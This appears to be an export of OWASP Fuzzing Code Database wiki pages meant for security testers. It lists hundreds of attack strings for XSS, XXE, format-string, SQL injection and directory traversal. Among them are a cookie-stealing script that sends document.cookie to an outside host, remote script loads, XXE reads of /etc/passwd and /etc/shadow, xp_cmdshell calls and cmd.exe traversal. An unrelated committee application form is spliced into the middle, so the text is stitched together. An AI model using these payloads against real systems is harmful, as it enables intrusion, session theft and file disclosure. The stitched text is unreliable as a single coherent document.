"<DIV STYLE=""width: expression(alert('XSS'));"">"
"<STYLE>@im\port'\ja\vasc\ript:alert(""XSS"")';</STYLE>"
"<IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))"">"
"<XSS STYLE=""xss:expression(alert('XSS'))"">"
"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'>"
"<STYLE TYPE=""text/javascript"">alert('XSS');</STYLE>"
"<STYLE>.XSS{background-image:url(""javascript:alert('XSS')"");}</STYLE><A CLASS=XSS></A>"
"<STYLE type=""text/css"">BODY{background:url(""javascript:alert('XSS')"")}</STYLE>"

"<BASE HREF=""javascript:alert('XSS');//"">"
"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""></OBJECT>"
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
"<EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""></EMBED>"
"<EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""></EMBED>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<XML ID=""xss""><I><B><IMG SRC=""javascript:alert('XSS')""></B></I></XML><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>"
"<XML SRC=""xsstest.xml"" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS<SCRIPT DEFER>alert(""XSS"")</SCRIPT>""></BODY></HTML>"
"<SCRIPT SRC=""http://ha.ckers.org/xss.jpg""></SCRIPT>"
""
"<? echo('<SCR)';echo('IPT>alert(""XSS"")</SCRIPT>'); ?>"
"<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('XSS')</SCRIPT>"">"
"<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"
"<SCRIPT a="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT ="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a="">"" '' SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT ""a='>'"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a=`>` SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a="">'>"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<A HREF=""http://66.102.7.147/"">XSS</A>"
"<A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"">XSS</A>"
"<A HREF=""http://1113982867/"">XSS</A>"
"<A HREF=""http://0x42.0x0000066.0x7.0x93/"">XSS</A>"
"<A HREF=""http://0102.0146.0007.00000223/"">XSS</A>"
"<A HREF=""h\ntt\tp://6"
"<A HREF=""//www.google.com/"">XSS</A>"
"<A HREF=""//google"">XSS</A>"
"<A HREF=""http://google.com/"">XSS</A>"
"<A HREF=""http://www.google.com./"">XSS</A>"
"<A HREF=""javascript:document.location='http://www.google.com/'"">XSS</A>"
"<A HREF=""http://www.gohttp://www.google.com/ogle.com/"">XSS</A>"
"<div onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<bgsound src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"&{document.write(""XSS-XSS-XSS"");};"
"<img src=&{document.write(""XSS-XSS-XSS"");};>"
"<link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<iframe src=""vbscript:document.write(""XSS-XSS-XSS"");"">"
"<img src=""livescript:document.write(""XSS-XSS-XSS"");"">"
"<a href=""about:<script>document.write(""XSS-XSS-XSS"");</script>"">"
"<meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");"">"
"<body onload=""document.write(""XSS-XSS-XSS"");"">"
"<div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););"">"
"<div style=""behaviour: url([link to code]);"">"
"<div style=""binding: url([link to code]);"">"
"<div style=""width: expression(document.write(""XSS-XSS-XSS""););"">"
"<style type=""text/javascript"">document.write(""XSS-XSS-XSS"");</style>"
"<object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<style></script>"
"<![CDATA[</script>"
"<<script>document.write(""XSS-XSS-XSS"");</script>"
"<img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=""blah>"" onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<div datafld=""b"" dataformatas=""html"" datasrc=""#X""></div>"
"<a href=""javascript#document.write(""XSS-XSS-XSS"");"">"
"<img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"&<script>document.write(""XSS-XSS-XSS"");</script>"
"<img src=""mocha:document.write(""XSS-XSS-XSS"");"">"
"<div style=""binding: url([link to code]);""> [Mozilla]"
"<script>document.write(""XSS-XSS-XSS"");</script>"
"<xml src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<xml id=""X""><a><b><script>document.write(""XSS-XSS-XSS"");</script>;</b></a></xml>"
"[\xC0][\xBC]script>document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script>"
><script>
"<script>alert(""WXSS"")</script>"
"<<script>alert(""WXSS"");//<</script>"
<script>alert(document.cookie)</script>
'><script>alert(document.cookie)</script>
'><script>alert(document.cookie);</script>
"%3cscript%3ealert(""WXSS"");%3c/script%3e"
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
&ltscript&gtalert(document.cookie);</script>
&ltscript&gtalert(document.cookie);&ltscript&gtalert
<xss><script>alert('WXSS')</script></vulnerable>
<IMG%20SRC='javascript:alert(document.cookie)'>
"<IMG%20SRC=""javascript:alert('WXSS');"">"
"<IMG%20SRC=""javascript:alert('WXSS')"""
<IMG%20SRC=JaVaScRiPt:alert('WXSS')>
<IMG%20SRC=javascript:alert("WXSS")>
"<IMG%20SRC=`javascript:alert(""'WXSS'"")`>"
"<IMG%20""""""><SCRIPT>alert(""WXSS"")</SCRIPT>"">"
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC='javasc
"<IMG%20SRC=""jav"
"<IMG%20SRC=""jav	ascript:alert('WXSS');"">"
"<IMG%20SRC=""jav
ascript:alert('WXSS');"">"
"<IMG%20SRC=""javascript:alert('WXSS');"">"
"<IMG%20SRC=""%20%20javascript:alert('WXSS');"">"
"<IMG%20DYNSRC=""javascript:alert('WXSS')"">"
"<IMG%20LOWSRC=""javascript:alert('WXSS')"">"
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
<IMG%20SRC=javascript:alert('XSS')>
<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
"><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
'';!--<XSS>=&{()}"
</pre>

=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===

<pre>
Statements
count(/child::node())
x' or name()='username' or 'x'='y
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml ID=""xss""><I><B><IMG SRC=""javascript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
</pre>

=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28)===

<pre>
%s%p%x%d
.1024d
%.2049d
%p%p%p%p
%x%x%x%x
%d%d%d%d
%s%s%s%s
%99999999999s
%08x
%%20d
%%20n
%%20x
%%20s
%s%s%s%s%s%s%s%s%s%s
%p%p%p%p%p%p%p%p%p%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
f(x)=%s x 123
f(x)=%x x 255
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
`perl -e 'print ".%p" x 80'`%n
%08x.%08x.%08x.%08x.%08x\n
XXX0_%08x.%08x.%08x.%08x.%08x\n
%.16705u%2\$hn
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;
</pre>

==== Project Contributor ====
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]

Reviewer: [[:User:eneves|'''Eduardo Neves''']]

Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]

==== Feedback and Participation ====

We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org

==== Project Identification ====

[[Category:OWASP Project|Fuzzing Code Database]]
[[Category:OWASP Document]]
[[Category:OWASP Alpha Quality Document]]

{{Template:OWASP Project Identification Tab
| project_name = OWASP Fuzzing Code Database
| project_description =
| leader_name = Wagner Elias
| leader_email =
| leader_username = Wagner.elias
| maintainer_name =
| maintainer_email =
| maintainer_username =
| contributor_name1 =
| contributor_email1 =
| contributor_username1 =
| contributor_name2 =
| contributor_email2 =
| contributor_username2 =
| contributor_name3 =
| contributor_email3 =
| contributor_username3 =
| contributor_name4 =
| contributor_email4 =
| contributor_username4 =
| contributor_name5 =
| contributor_email5 =
| contributor_username5 =
| contributor_name6 =
| contributor_email6 =
| contributor_username6 =
| contributor_name7 =
| contributor_email7 =
| contributor_username7 =
| contributor_name8 =
| contributor_email8 =
| contributor_username8 =
| contributor_name9 =
| contributor_email9 =
| contributor_username9 =
| contributor_name10 =
| contributor_email10 =
| contributor_username10 =
| pamphlet_link =
| mailing_list_name = owasp-fuzzing-code-database
| links_url1 =
| links_name1 =
| links_url2 =
| links_name2 =
| links_url3 =
| links_name3 =
| links_url4 =
| links_name4 =
| links_url5 =
| links_name5 =
| links_url6 =
| links_name6 =
| links_url7 =
| links_name7 =
| links_url8 =
| links_name8 =
| links_url9 =
| links_name9 =
| links_url10 =
| links_name10 =
| project_road_map =
| project_health_status =
| current_release_name =
| current_release_date =
| current_release_download_link =
| current_release_rating =
| current_release_leader_name =
| current_release_leader_email =
| current_release_leader_username =
| last_reviewed_release_name =
| last_reviewed_release_date =
| last_reviewed_release_download_link =
| last_reviewed_release_rating =
| last_reviewed_release_leader_name =
| last_reviewed_release_leader_email =
| last_reviewed_release_leader_username =
| old_release_name1 =
| old_release_date1 =
| old_release_download_link1 =
| old_release_name2 =
| old_release_date2 =
| old_release_download_link2 =
| old_release_name3 =
| old_release_date3 =
| old_release_download_link3 =
| old_release_name4 =
| old_release_date4 =
| old_release_download_link4 =
| old_release_name5 =
| old_release_date5 =
| old_release_download_link5 =
}}
__NOTOC__ <headertabs />

Global Conferences Committee - Application 2

2009-11-16T23:48:32Z

Wagner.elias:

[[How to Join a Committee|Click here to return to 'How to Join a Committee' page]]

----
{| style="width:100%" border="0" align="center"
! colspan="2" align="center" style="background:#4058A0; color:white"|<font color="white">'''COMMITTEE APPLICATION FORM'''
|-
| style="width:25%; background:#7B8ABD" align="center"|'''Applicant's Name'''
| colspan="1" style="width:85%; background:#cccccc" align="left"|<font color="black">Lucas C. Ferreira.
|-
| style="width:25%; background:#7B8ABD" align="center"| '''Current and past OWASP Roles'''
| colspan="1" style="width:85%; background:#cccccc" align="left"|OWASP Brazilian Chapter member, AppSec Brasil 2009 Chair.
|-
| style="width:25%; background:#7B8ABD" align="center"| '''Committee Applying for'''
| colspan="1" style="width:85%; background:#cccccc" align="left"|OWASP Global Conferences Committee.
|}
----

----
Please be aware that for an application to be considered by the board, '''you MUST have 5 recommendations'''.
An incomplete application will not be considered for vote.
----

----
{| style="width:100%" border="0" align="center"
! colspan="8" align="center" style="background:#4058A0; color:white"|<font color="white">'''COMMITTEE RECOMMENDATIONS'''
|-
! align="center" style="background:white; color:white"|<font color="black">
! align="center" style="background:#7B8ABD; color:white"|<font color="black">'''Who Recommends/Name'''
! align="center" style="background:#7B8ABD; color:white"|<font color="black">'''Role in OWASP'''
! align="center" style="background:#7B8ABD; color:white"|<font color="black">'''Recommendation Content'''
|-
| style="width:3%; background:#cccccc" align="center"|'''1'''
| style="width:20%; background:#cccccc" align="center"| Eduardo Vianna de Camargo Neves
| style="width:20%; background:#cccccc" align="center"| GEC Member
| style="width:57%; background:#cccccc" align="center"| An outstanding OWASP Member that allocated heart and soul to make the OWASP AppSec Brasil 2009 happens and is already doing the same for the 2010 Edition. Moreover, Lucas is a high evangelist of OWASP resources within the Brazilian IT Community with a strong presence on the Government Sector and Academia.
|-
| style="width:3%; background:#cccccc" align="center"|'''2'''
| style="width:20%; background:#cccccc" align="center"| Pravir Chandra
| style="width:20%; background:#cccccc" align="center"| GPC Member
| style="width:57%; background:#cccccc" align="center"| Lucas is highly motivated and actually executes on his commitments very well. He did a great job in organizing AppSec Brasil 2009 and would be a great asset for the Global Conferences Committee.
|-
| style="width:3%; background:#cccccc" align="center"|'''3'''
| style="width:20%; background:#cccccc" align="center"| Matt Tesauro
| style="width:20%; background:#cccccc" align="center"| GPC Member
| style="width:57%; background:#cccccc" align="center"| Lucas has already demonstrated that he's qualified for this position based on the success of AppSec Brasil 2009. He went from zero to conference is a pretty short window. Not only did he pull off a successful conference, he did so under fire - he lost several speakers due to the flu, I had a crazy mishap with my flights and barely made the first day of the class I was teaching. Under all this, he kept his cool and keep the conference on track. I suspect that the only reason I know about these issues is I was both an instructor and speaker. For those just attending the conference, they would have only seen a smoothly running gig.
|-
| style="width:3%; background:#cccccc" align="center"|'''4'''
| style="width:20%; background:#cccccc" align="center"| Wagner Elias
| style="width:20%; background:#cccccc" align="center"| Brazil Chapter Leader
| style="width:57%; background:#cccccc" align="center"| Lucas is the member who contributes most to the growth of the Brazil chapter, this is due to the excellent organization has done in the first AppSec Brazil. No doubt he is a great name for a Committee.
|-
| style="width:3%; background:#cccccc" align="center"|'''5'''
| style="width:20%; background:#cccccc" align="center"|
| style="width:20%; background:#cccccc" align="center"|
| style="width:57%; background:#cccccc" align="center"|
|}
----

Category:OWASP Fuzzing Code Database

2009-08-11T19:29:37Z

Wagner.elias:

This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated.
We want to collect all these statements, merging the statements from several projects like [[WebScarab]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results.
Please add your own statements and check out the statements already added.

==== News ====

'''11 August 2009'''

* Created new Category: XML Attacks

''Update Statements''

* 15 new XML Statements
* 93 new SQL Injections Statements
* 67 new Traversal Directory Statements
* Delete 33 XSS Statement Duplicate
* 30 New XSS Statements

'''7 August 2009'''

* Updated the objectives of the project.

'''21 July 2009'''

* Set the team responsible for the project.

==== Goals ====

This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.

In addition, the following functionalities will be included on this project:

1 - The statements of ASDR Project
2 - Browser
3 - Operational System
4 - Databases

An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:

1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.

2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.

3 - Possibility to support users on the report of their own experiences with the statements.

==== Statements ====

=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===

<pre>
Statement
'sqlvuln
'+sqlvuln
sqlvuln;
(sqlvuln)
a' or 1=1--
"a"" or 1=1--"
or a = a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (4000) select @q =
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0
031003000270000
declare @s varchar(22) select @s =
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
exec(@s)
a'
?
' or 1=1
‘ or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
anything' OR 'x'='x
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND members.email IS NULL; --
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
or 0=0 #"
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
or 1=1 or ""=
' or a=a--
or a=a
') or ('a'='a
) or (a=a
hi or a=a
hi or 1=1 --"
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
"hi"") or (""a""=""a"
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
'%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
a' or 3=3--
"a"" or 3=3--"
' or 3=3
‘ or 3=3 --
</pre>

=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) ===

<pre>
<br/>
<br/>
<br/>
<br/>
</pre>

=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===

<pre>
Statement
\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
../../../.htaccess
../../.htaccess
../.htaccess
.htaccess
././.htaccess
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
